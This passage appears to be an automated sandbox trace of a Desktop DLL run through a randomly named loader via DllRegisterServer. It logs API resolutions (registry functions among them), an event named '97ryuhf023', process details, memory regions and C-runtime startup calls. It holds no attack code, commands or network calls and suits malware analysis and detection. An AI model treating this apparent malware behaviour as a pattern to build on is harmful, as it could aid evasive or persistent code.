(hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.783] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.783] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.783] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.783] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.783] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.784] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.784] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.784] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.785] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.786] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.786] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.787] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.787] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.801] HeapDestroy (hHeap=0x7d0000) returned 1 Process: id = "14" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f820" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 732 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 733 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 734 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 735 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 736 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 737 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 738 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 739 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 740 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 741 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 742 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 743 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 744 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 745 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 746 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 747 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 748 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 749 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 750 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 751 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 752 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 753 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 754 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 755 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 756 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 757 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 758 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 759 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 760 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 761 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 762 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 763 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 764 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 765 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 766 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 767 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 768 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 769 start_va = 0x630000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 770 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 771 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 772 start_va = 0x630000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 773 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Thread: id = 34 os_tid = 0xafc [0031.867] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9ec | out: lpSystemTimeAsFileTime=0x1ef9ec*(dwLowDateTime=0xe0b6c5b0, dwHighDateTime=0x1d3dfba)) [0031.867] GetCurrentProcessId () returned 0xaf8 [0031.867] GetCurrentThreadId () returned 0xafc [0031.867] GetTickCount () returned 0x17203 [0031.867] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9e4 | out: lpPerformanceCount=0x1ef9e4*=361808234) returned 1 [0031.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.868] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.869] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.869] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.869] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.869] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.870] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.870] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.870] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.877] GetCurrentThreadId () returned 0xafc [0031.877] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"0\"" [0031.877] GetEnvironmentStringsW () returned 0x297860* [0031.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x8009f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.877] FreeEnvironmentStringsW (penv=0x297860) returned 1 [0031.877] GetStartupInfoA (in: lpStartupInfo=0x1ef93c | out: lpStartupInfo=0x1ef93c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.877] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.877] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.877] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.877] SetHandleCount (uNumber=0x20) returned 0x20 [0031.877] GetLastError () returned 0x0 [0031.877] SetLastError (dwErrCode=0x0) [0031.877] GetLastError () returned 0x0 [0031.878] SetLastError (dwErrCode=0x0) [0031.878] GetLastError () returned 0x0 [0031.878] SetLastError (dwErrCode=0x0) [0031.878] GetACP () returned 0x4e4 [0031.878] GetLastError () returned 0x0 [0031.878] SetLastError (dwErrCode=0x0) [0031.878] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.878] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef91c | out: lpCPInfo=0x1ef91c) returned 1 [0031.878] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef3e8 | out: lpCPInfo=0x1ef3e8) returned 1 [0031.878] GetLastError () returned 0x0 [0031.878] SetLastError (dwErrCode=0x0) [0031.878] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1ef378 | out: lpCharType=0x1ef378) returned 1 [0031.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7fc, cbMultiByte=256, lpWideCharStr=0x1ef168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0031.878] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1ef3fc | out: lpCharType=0x1ef3fc) returned 1 [0031.878] GetLastError () returned 0x0 [0031.878] SetLastError (dwErrCode=0x0) [0031.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7fc, cbMultiByte=256, lpWideCharStr=0x1ef138, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1eef28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1ef6fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿç8ÿõ4ù\x1e", lpUsedDefaultChar=0x0) returned 256 [0031.878] GetLastError () returned 0x0 [0031.878] SetLastError (dwErrCode=0x0) [0031.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef7fc, cbMultiByte=256, lpWideCharStr=0x1ef158, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 